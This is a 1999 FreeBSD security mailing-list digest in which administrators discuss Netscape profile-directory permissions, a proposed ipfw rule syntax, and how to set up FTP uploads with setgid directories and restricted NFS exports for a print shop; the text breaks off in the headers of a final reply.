http://www.watson.org/~robert/ PGP key fingerprint: 03 01 DD 8E 15 67 48 73 25 6D 10 FC EC 68 C1 1C Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 9 14:35:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from hosting.doublesquare.com (hosting.doublesquare.com [195.5.128.151]) by hub.freebsd.org (Postfix) with ESMTP id A46C914F46 for ; Fri, 9 Apr 1999 14:32:15 -0700 (PDT) (envelope-from ark@eltex.ru) Received: from eltex.ru (ELTEX-2-SPIIRAS.nw.ru [195.19.204.46] (may be forged)) by hosting.doublesquare.com (8.8.8/8.8.8) with ESMTP id UAA08741 for ; Fri, 9 Apr 1999 20:49:02 +0400 (MSD) From: ark@eltex.ru Received: from border.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with SMTP id UAA00663; Fri, 9 Apr 1999 20:47:49 +0400 (MSD) Received: by border.eltex.spb.ru (ssmtp TIS-0.5alpha, 19 Oct 1998); Fri, 9 Apr 1999 20:47:36 +0400 Received: from undisclosed-intranet-sender id xma017420; Fri, 9 Apr 99 20:47:20 +0400 Date: Fri, 9 Apr 1999 20:47:17 +0400 Message-Id: <199904091647.UAA25769@paranoid.eltex.spb.ru> Organization: "Klingon Imperial Intelligence Service" Subject: Re: Generic Software Wrappers To: robert+freebsd@cyrus.watson.org Cc: feldman@tislabs.com, ark@eltex.ru, freebsd-security@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- nuqneH, Sounds extremely interesting, but the license is definitely too restrictive to make the tool really useful in general :( hope this will change.. _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBNw4vEaH/mIJW9LeBAQEWewP/RrLw/0X7eEl8lRaL0EO5hnGxg+PsmH2R ItqDvCWOgxWfxdGGT5pq3xd2ScgPt0zzYi0MW6PIb2ilwFM1NTZ71A7vz/t+gE2H XuimZanp0Wm7IUhuE2UiRNrF0FUNbTzC5JfuUhi3PnVtaHoXuYvlxx6qfrzZGqk1 rEeq493xO7I= =2jmr -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 9 15:11:30 1999 Delivered-To: freebsd-security@freebsd.org Received: from phoenix.unacom.com (unacom.com [206.113.48.2]) by hub.freebsd.org (Postfix) with SMTP id 8072D15F22 for ; Fri, 9 Apr 1999 15:06:35 -0700 (PDT) (envelope-from geniusj@phoenix.unacom.com) Received: (qmail 74474 invoked by uid 1000); 9 Apr 1999 14:57:37 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 9 Apr 1999 14:57:37 -0000 Date: Fri, 9 Apr 1999 10:57:37 -0400 (EDT) From: The Tech-Admin Dude To: Wes Peters Cc: Daniel Hagan , Robert Watson , Matthew Dillon , Foxfair Hu , freebsd-security@FreeBSD.ORG Subject: Re: Fw: Netscape 4.5 vulnerability In-Reply-To: <370E0336.83577BA7@softweyr.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 9 Apr 1999, Wes Peters wrote: > Daniel Hagan wrote: > > > > On Thu, 8 Apr 1999, Robert Watson wrote: > > > > > > The 'security hole' is that netscape doesn't make the .netscape > > > > directory 700. I'd report it to netscape. I dunno whether they > > > > will do anything about it, though. > > > > > > Huh. Didn't do that for me; mine is safely readable and writable only for > > > my uid. > > > > What's your umask? If you use umask 077, then this is what I would > > expect, but "typical" users who don't change it from 022 would probably > > end up with a 755 .netscape directory. Netscape should be smart enough to > > at least set the profile file to 600, if not the entire directory to 700. > > My umask is 022 and my .netscape directory is 700. I didn't change it, > so Netscape must have created it that way. This is Communicator 4.5 > (linux version; it's more reliable than the FreeBSD binary) on 3.1. > > -- > "Where am I, and what am I doing in this handbasket?" > > Wes Peters Softweyr LLC > http://www.softweyr.com/~softweyr wes@softweyr.com > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > I'm using the FreeBSD binary and it is only readable to my UID also, and I have not changed a thing.. One is not more reliable than the other, its the same code folks.. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 9 16:28:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from labinfo.iet.unipi.it (labinfo.iet.unipi.it [131.114.9.5]) by hub.freebsd.org (Postfix) with SMTP id 27A031508D; Fri, 9 Apr 1999 16:28:20 -0700 (PDT) (envelope-from luigi@labinfo.iet.unipi.it) Received: from localhost (luigi@localhost) by labinfo.iet.unipi.it (8.6.5/8.6.5) id PAA00939; Fri, 9 Apr 1999 15:03:12 +0200 From: Luigi Rizzo Message-Id: <199904091303.PAA00939@labinfo.iet.unipi.it> Subject: Re: Ipfw related. To: ru@ucb.crimea.ua (Ruslan Ermilov) Date: Fri, 9 Apr 1999 15:03:12 +0200 (MET DST) Cc: smelekov@vniigazmain.gazprom.ru, freebsd-security@freebsd.org, luigi@freebsd.org In-Reply-To: <19990409141345.A31742@relay.ucb.crimea.ua> from "Ruslan Ermilov" at Apr 9, 99 02:13:26 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 493 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > Is there any other ways to deny packets in both sides (in and out) > > by writing only one ipfw rule? > > > > No, not yet. > > Luigi had some plans (???) to implement ``between'' predicate, > so you'd be able to write: > > ipfw add xxxx deny ip between my.host.com and evil.host.com unfortunately, just plans (or even precise ideas on how to implement something, as in this case) without a strong need for a feature mean it will be severely delayed by other things... cheers luigi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 9 18:11:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 98EEB14DD7 for ; Fri, 9 Apr 1999 18:11:43 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id TAA01658 for ; Fri, 9 Apr 1999 19:09:26 -0600 (MDT) Message-Id: <4.2.0.32.19990409184654.045424d0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Fri, 09 Apr 1999 19:09:23 -0600 To: security@freebsd.org From: Brett Glass Subject: Interesting problem: chowning files sent via FTP Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Here's an interesting security problem that perhaps folks on this list can help with. I'm working with a client who does printing and computer graphics. He wants his customers to be able to upload graphics files via FTP and then allow an on-site operator to retrieve them. The customers should be able to FTP only into their own home directories (easy to implement via the built-in chrooting features of ftpd). The operator should be able to read and delete the files the users upload, preferably via NFS. But he shouldn't have full root privileges -- rather, he should have just enough privilege to work with those files. It seems to me that a good way to implement this would be to have the customers make their uploaded files group read/writable by a group of which the operator is the sole member. The operator would then mount /home via NFS, and would be granted only the privileges associated with his user ID and group. This would allow him to read and delete the files that the users had uploaded for him, but would not let him mess with the directory structure or with any files that hadn't been uploaded with the right modes or ownership. There are two problems, though. First of all, it appears that FTP doesn't have a built-in way of setting group ownership of an uploaded file. (It does let you set the UMASK, but there's no obvious way to say which group "owns" the file.) How could this be done by the FTP client? Can the customer give group ownership of the file to a group of which the user is not himself a member? Second, I need to set up NFS so that only the operator can mount /home from his one machine, and only with the privileges that would be accorded to him if he logged onto the machine himself. We want to make this as secure as possible, since the customers' data may be proprietary. So, we'll want to restrict NFS mounts to a specific IP address and authenticate as best we can. (If it's REALLY necessary, we may be able have the operator use FTP, but this is less desirable than letting him mount the directory.) Ideas on how to solve these two problems? Any other considerations I should be thinking of? --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 9 19:47:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from socrates.i-pi.com (socrates.i-pi.com [198.49.217.5]) by hub.freebsd.org (Postfix) with ESMTP id 9FF8714F8B for ; Fri, 9 Apr 1999 19:47:36 -0700 (PDT) (envelope-from ingham@socrates.i-pi.com) Received: (from ingham@localhost) by socrates.i-pi.com (8.9.1/8.9.1) id TAA00735; Fri, 9 Apr 1999 19:44:02 -0600 Message-ID: <19990409194402.A731@socrates.i-pi.com> Date: Fri, 9 Apr 1999 19:44:02 -0600 From: Kenneth Ingham To: Brett Glass , security@FreeBSD.ORG Subject: Re: Interesting problem: chowning files sent via FTP References: <4.2.0.32.19990409184654.045424d0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2 In-Reply-To: <4.2.0.32.19990409184654.045424d0@localhost>; from Brett Glass on Fri, Apr 09, 1999 at 07:09:23PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org As I remember (and I just checked this on a 2.2.8 system and it appears to be correct), the default group owner of a file is the group owner of the directory containing the file. I've seen other systems which set the setgid bit on the dir to get this behavior. Kenneth To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 9 21:30:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (unknown [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id A9B9814F06 for ; Fri, 9 Apr 1999 21:30:39 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com ([204.68.178.225]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id WAA29158; Fri, 9 Apr 1999 22:28:04 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <370EC49F.1A020B9D@softweyr.com> Date: Fri, 09 Apr 1999 21:25:19 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: Interesting problem: chowning files sent via FTP References: <4.2.0.32.19990409184654.045424d0@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brett Glass wrote: > > Here's an interesting security problem that perhaps folks on this list can > help with. I'm working with a client who does printing and computer > graphics. He wants his customers to be able to upload graphics files via > FTP and then allow an on-site operator to retrieve them. > > The customers should be able to FTP only into their own home directories > (easy to implement via the built-in chrooting features of ftpd). The > operator should be able to read and delete the files the users upload, > preferably via NFS. But he shouldn't have full root privileges -- rather, > he should have just enough privilege to work with those files. > > It seems to me that a good way to implement this would be to have the > customers make their uploaded files group read/writable by a group of which > the operator is the sole member. The operator would then mount /home via > NFS, and would be granted only the privileges associated with his user ID > and group. This would allow him to read and delete the files that the users > had uploaded for him, but would not let him mess with the directory > structure or with any files that hadn't been uploaded with the right modes > or ownership. > > There are two problems, though. First of all, it appears that FTP doesn't > have a built-in way of setting group ownership of an uploaded file. (It > does let you set the UMASK, but there's no obvious way to say which group > "owns" the file.) How could this be done by the FTP client? Can the > customer give group ownership of the file to a group of which the user is > not himself a member? An interesting problem you have there, Brett. I can think of one quick solution: if the ftp server is dedicated to this task, you could make ftpd sgid to the "printer" group. It's too bad that the exports file does not support "mapgroup" commands orthogonal to the "maproot" command. Arbitrary user mappings might be of value too, but I can see how they could quickly grow completely out of reason. > Second, I need to set up NFS so that only the operator can mount /home from > his one machine, and only with the privileges that would be accorded to him > if he logged onto the machine himself. We want to make this as secure as > possible, since the customers' data may be proprietary. So, we'll want to > restrict NFS mounts to a specific IP address and authenticate as best we > can. (If it's REALLY necessary, we may be able have the operator use FTP, > but this is less desirable than letting him mount the directory.) > > Ideas on how to solve these two problems? Any other considerations I should > be thinking of? I'm thinking you can probably do this by exporting the filesystem from the ftp server ONLY to the printer's workstation, and exporting with -mapall=printeruid:printergid. Run the ftpd as sgid printergid, so the files end up being group owned by printergid. I'm not sure how this will interact with being able to delete the files, but if you think along these lines I think you can solve it without hacking {much|anything}. Best of luck, and write back if you have specific questions. I'm a little intrigued by this. I know several print shops around here that try, and often fail, to have clients email them large postscript or pre-ripped print files, and they may be able to benefit from your experience also. ;^) -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 9 21:35:58 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 90E6714D7D for ; Fri, 9 Apr 1999 21:35:56 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id WAA03074; Fri, 9 Apr 1999 22:33:34 -0600 (MDT) Message-Id: <4.2.0.32.19990409223014.0451c930@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Fri, 09 Apr 1999 22:33:33 -0600 To: Kenneth Ingham , security@FreeBSD.ORG From: Brett Glass Subject: Re: Interesting problem: chowning files sent via FTP In-Reply-To: <19990409194402.A731@socrates.i-pi.com> References: <4.2.0.32.19990409184654.045424d0@localhost> <4.2.0.32.19990409184654.045424d0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Is this so? I was under the impression that the default group of a new file was the login group of the creator, as specified in /etc/passwd. As for the setgid-on-execution bit: there's no documentation on what it does when set on a directory. The chmod(1) man page doesn't say anything. Does it change the group ownership of newly created files? --Brett At 07:44 PM 4/9/99 -0600, Kenneth Ingham wrote: >As I remember (and I just checked this on a 2.2.8 system and it appears >to be correct), the default group owner of a file is the group owner of the >directory containing the file. > >I've seen other systems which set the setgid bit on the dir to get this >behavior. > >Kenneth To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 9 22: 0:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 3DF9E14F8C for ; Fri, 9 Apr 1999 22:00:09 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id WAA03232; Fri, 9 Apr 1999 22:57:28 -0600 (MDT) Message-Id: <4.2.0.32.19990409223443.0451c100@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Fri, 09 Apr 1999 22:56:52 -0600 To: Wes Peters From: Brett Glass Subject: Re: Interesting problem: chowning files sent via FTP Cc: security@FreeBSD.ORG In-Reply-To: <370EC49F.1A020B9D@softweyr.com> References: <4.2.0.32.19990409184654.045424d0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 09:25 PM 4/9/99 -0600, Wes Peters wrote: >An interesting problem you have there, Brett. I can think of one quick >solution: if the ftp server is dedicated to this task, you could make >ftpd sgid to the "printer" group. An interesting idea. However, other users who used FTP (including administrators!) would wind up creating files that were owned by the "printer" group instead of their own group. We wouldn't want that as the default behavior. The responses about the "setgid" bit on directories suggest a possible way to make this work, but I'll have to test the behavior to see if it really happens. It's not documented, but who knows? It just might work. Do you have experience with this? >It's too bad that the exports file does not support "mapgroup" commands >orthogonal to the "maproot" command. Arbitrary user mappings might be >of value too, but I can see how they could quickly grow completely out >of reason. Well, any sort of access control to a UNIX server really ought to include both user and group permissions. Otherwise, you've lost the control that UNIX affords over file access. Groups in UNIX are far from ideal, though, because a file can have only one owning group. And the number of groups of which a user can be a member is limited and implementation-dependent. (FreeBSD squawks when a user is a member of more than 16 groups.) The number of members of a group is likewise limited. (I believe that in FreeBSD the limit's 200.) All of these constraints make implementing any security scheme a bit awkward. >I'm thinking you can probably do this by exporting the filesystem from >the ftp server ONLY to the printer's workstation, and exporting with >-mapall=printeruid:printergid. I'm looking at something like this. If we use a dedicated Ethernet interface for the link to the printer's workstation and only allow Subnet 10 IP addresses on that link, we'll be able to restrict mounts to the one Subnet 10 address. It'd be tough to penetrate this, especially with ipfw configured properly and a firewall router on the other interface. Y'know, it'd be really nice if NFS had "accounts" and "passwords" per se, but as far as I know the only version that had anything like this was a proposed "standard" for file transfers that went nowhere. (What was the name again? I forget.) >Best of luck, and write back if you have specific questions. I'm a little >intrigued by this. I know several print shops around here that try, and >often fail, to have clients email them large postscript or pre-ripped print >files, and they may be able to benefit from your experience also. ;^) Well, FTP isn't an ideal solution, because it sends passwords in the clear. But if you place disk space quotas on the users and chroot them, the damage that can be done with a sniffed password is at least limited. A VPN protocol or secure sockets would be preferable, and I'm moving them to such things as fast as I can. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 9 22:25:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (unknown [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id D422114D51 for ; Fri, 9 Apr 1999 22:25:08 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com ([204.68.178.225]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id XAA29244; Fri, 9 Apr 1999 23:22:43 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <370ED16D.582E4F19@softweyr.com> Date: Fri, 09 Apr 1999 22:19:57 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: Interesting problem: chowning files sent via FTP References: <4.2.0.32.19990409184654.045424d0@localhost> <4.2.0.32.19990409223443.0451c100@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brett Glass wrote: > > At 09:25 PM 4/9/99 -0600, Wes Peters wrote: > > >An interesting problem you have there, Brett. I can think of one quick > >solution: if the ftp server is dedicated to this task, you could make > >ftpd sgid to the "printer" group. > > An interesting idea. However, other users who used FTP (including > administrators!) would wind up creating files that were owned > by the "printer" group instead of their own group. We wouldn't > want that as the default behavior. The responses about the "setgid" > bit on directories suggest a possible way to make this work, but > I'll have to test the behavior to see if it really happens. It's > not documented, but who knows? It just might work. Do you have > experience with this? I just gave it a try here, by adding myself to the "xten" group and logging in freshly. I changed a directory under my home to group xten, cd'd into it, and touched a file. Sure enough, it was owned by group xten. I ftp'd to localhost, cd'd to that directory, and put a file, which ended up owned by xten as well. It looks like this will work for you. > >It's too bad that the exports file does not support "mapgroup" commands > >orthogonal to the "maproot" command. Arbitrary user mappings might be > >of value too, but I can see how they could quickly grow completely out > >of reason. > > Well, any sort of access control to a UNIX server really ought to include > both user and group permissions. Otherwise, you've lost the control that > UNIX affords over file access. > > Groups in UNIX are far from ideal, though, because a file can have only one > owning group. And the number of groups of which a user can be a member > is limited and implementation-dependent. (FreeBSD squawks when a user > is a member of more than 16 groups.) The number of members of a group > is likewise limited. (I believe that in FreeBSD the limit's 200.) All of > these constraints make implementing any security scheme a bit awkward. Yet another design for an ACL filesystem was bandied about a month ago, but as usual everyone went hog-wild with unlimited lists of ACLs, and disk blocks scattered all over hell and back, and then went nowhere with it. And they wonder why I get pissed and tell them "do the simple one first, then expand it if it needs expanding." Five or eight ACLs is better than none, and is probably better than thousands of ACLs that never get implemented, too. > >I'm thinking you can probably do this by exporting the filesystem from > >the ftp server ONLY to the printer's workstation, and exporting with > >-mapall=printeruid:printergid. > > I'm looking at something like this. If we use a dedicated Ethernet > interface for the link to the printer's workstation and only allow > Subnet 10 IP addresses on that link, we'll be able to restrict mounts > to the one Subnet 10 address. It'd be tough to penetrate this, > especially with ipfw configured properly and a firewall router on > the other interface. I'd suggest using a dedicated NIC on both the ftp server and the printers workstation, if at all possible. A single crossover wire would make it VERY difficult to abuse that interface for hacking purposes, at least without being noticed. You could script a simple monitor that would warn of any disruptions in service if you're really concerned about the link. > Y'know, it'd be really nice if NFS had "accounts" and "passwords" per se, > but as far as I know the only version that had anything like this was a > proposed "standard" for file transfers that went nowhere. (What was > the name again? I forget.) FSP? I never really looked into it that much, it seemed like it was doomed before it got out of the chute. Seems a shame, too, given that it was supposedly more reliable than NFS and easier to control than either NFS or FTP. > >Best of luck, and write back if you have specific questions. I'm a little > >intrigued by this. I know several print shops around here that try, and > >often fail, to have clients email them large postscript or pre-ripped print > >files, and they may be able to benefit from your experience also. ;^) > > Well, FTP isn't an ideal solution, because it sends passwords in the clear. > But if you place disk space quotas on the users and chroot them, the damage > that can be done with a sniffed password is at least limited. A VPN protocol > or secure sockets would be preferable, and I'm moving them to such things as > fast as I can. One of these days somebody needs to actually implement a mailer that supports the "external reference" capability of MIME. You know, you attach a huge file to a mail message, and rather than sending the file base64 encoded through the email system it sticks it on a secure public server along with a list of who you've sent it to and an expiration date. The public server will allow only those who were sent the file to retrieve it. Once everyone has accessed the file OR the expiration date has been reached, the file is quietly deleted from the public server. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 9 22:50:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 0955714EEE for ; Fri, 9 Apr 1999 22:50:52 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id XAA03612; Fri, 9 Apr 1999 23:48:27 -0600 (MDT) Message-Id: <4.2.0.32.19990409234113.04621730@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Fri, 09 Apr 1999 23:48:23 -0600 To: Wes Peters From: Brett Glass Subject: Re: Interesting problem: chowning files sent via FTP Cc: security@FreeBSD.ORG In-Reply-To: <370ED16D.582E4F19@softweyr.com> References: <4.2.0.32.19990409184654.045424d0@localhost> <4.2.0.32.19990409223443.0451c100@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 10:19 PM 4/9/99 -0600, Wes Peters wrote: >I'd suggest using a dedicated NIC on both the ftp server and the >printers workstation, if at all possible. Well, actually, the printer will mount the NFS volume through his Netware server. (I only learned recently that this was possible.) So, the link would go to his server. It'd be quite secure still, though, as Netware has good security. > FSP? I never really looked into it that much, it seemed like it was >doomed before it got out of the chute. Seems a shame, too, given that >it was supposedly more reliable than NFS and easier to control than >either NFS or FTP. It was done to counter a Microsoft proposal which likewise went nowhere. Both died due to lack of interest. >One of these days somebody needs to actually implement a mailer that >supports the "external reference" capability of MIME. You know, you >attach a huge file to a mail message, and rather than sending the >file base64 encoded through the email system it sticks it on a secure >public server along with a list of who you've sent it to and an expiration >date. The public server will allow only those who were sent the file to >retrieve it. Once everyone has accessed the file OR the expiration date >has been reached, the file is quietly deleted from the public server. I like that idea. The only trick would be authenticating the users who went to the public drop to pick up the file. You'd need to give them unique keys which they'd have to decode with some secret they had.... Perhaps their RSA private keys. And then re-encrypt with the repository's public key. Hmmm. This gets complicated. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 9 23:40:30 1999 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (unknown [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 3AFBF14ED6 for ; Fri, 9 Apr 1999 23:40:27 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com ([204.68.178.225]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id AAA29375; Sat, 10 Apr 1999 00:38:09 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <370EE31D.E6A8B0EC@softweyr.com> Date: Fri, 09 Apr 1999 23:35:25 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: Interesting problem: chowning files sent via FTP References: <4.2.0.32.19990409184654.045424d0@localhost> <4.2.0.32.19990409223443.0451c100@localhost> <4.2.0.32.19990409234113.04621730@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brett Glass wrote: > > At 10:19 PM 4/9/99 -0600, Wes Peters wrote: > > >One of these days somebody needs to actually implement a mailer that > >supports the "external reference" capability of MIME. You know, you > >attach a huge file to a mail message, and rather than sending the > >file base64 encoded through the email system it sticks it on a secure > >public server along with a list of who you've sent it to and an expiration > >date. The public server will allow only those who were sent the file to > >retrieve it. Once everyone has accessed the file OR the expiration date > >has been reached, the file is quietly deleted from the public server. > > I like that idea. The only trick would be authenticating the users who > went to the public drop to pick up the file. You'd need to give them unique > keys which they'd have to decode with some secret they had.... Perhaps > their RSA private keys. And then re-encrypt with the repository's public > key. Hmmm. This gets complicated. I think the idea was to generate a one-time key that was transported in the MIME header, with the idea that the document itself would be encrypted it if contained sensitive information. The combination of the key and your RSA encryption suffice for authentication, and using the senders public key authenticates the sender to the recipient. It's basically the PGP scheme all over again, where the doubly encrypted data this time is an access key rather than an encryption secret. You could, of course, use the access key as an encryption secret as well. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 10 0:19:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id AFC56150BE for ; Sat, 10 Apr 1999 00:19:22 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 31186 invoked by uid 1001); 10 Apr 1999 07:17:08 +0000 (GMT) To: brett@lariat.org Cc: ingham@i-pi.com, security@FreeBSD.ORG Subject: Re: Interesting problem: chowning files sent via FTP From: sthaug@nethelp.no In-Reply-To: Your message of "Fri, 09 Apr 1999 22:33:33 -0600" References: <4.2.0.32.19990409223014.0451c930@localhost> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Sat, 10 Apr 1999 09:17:08 +0200 Message-ID: <31184.923728628@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Is this so? I was under the impression that the default group of a > new file was the login group of the creator, as specified in /etc/passwd. AFAIK, in all BSD versions the default group of a new file is the group of the directory it is created in. > As for the setgid-on-execution bit: there's no documentation on what it > does when set on a directory. The chmod(1) man page doesn't say anything. > Does it change the group ownership of newly created files? setgid on a directory is a SYSV-ism (or rather, close to a SVR4-ism). It means that the SYSV system in question should follow the BSD semantics for files created in this directory, instead of the default SYSV semantics (set the group of the file to the effective gid of the creating process). setgid on a directory works this way at least in Solaris 2 and HP-UX 10.x/ 11.x. Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 10 0:55:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from alecto.physics.uiuc.edu (alecto.physics.uiuc.edu [130.126.8.20]) by hub.freebsd.org (Postfix) with ESMTP id 3F1B214C26 for ; Sat, 10 Apr 1999 00:55:08 -0700 (PDT) (envelope-from igor@alecto.physics.uiuc.edu) Received: (from igor@localhost) by alecto.physics.uiuc.edu (8.9.0/8.9.0) id CAA21374; Sat, 10 Apr 1999 02:52:54 -0500 (CDT) From: Igor Roshchin Message-Id: <199904100752.CAA21374@alecto.physics.uiuc.edu> Subject: Re: Interesting problem: chowning files sent via FTP In-Reply-To: 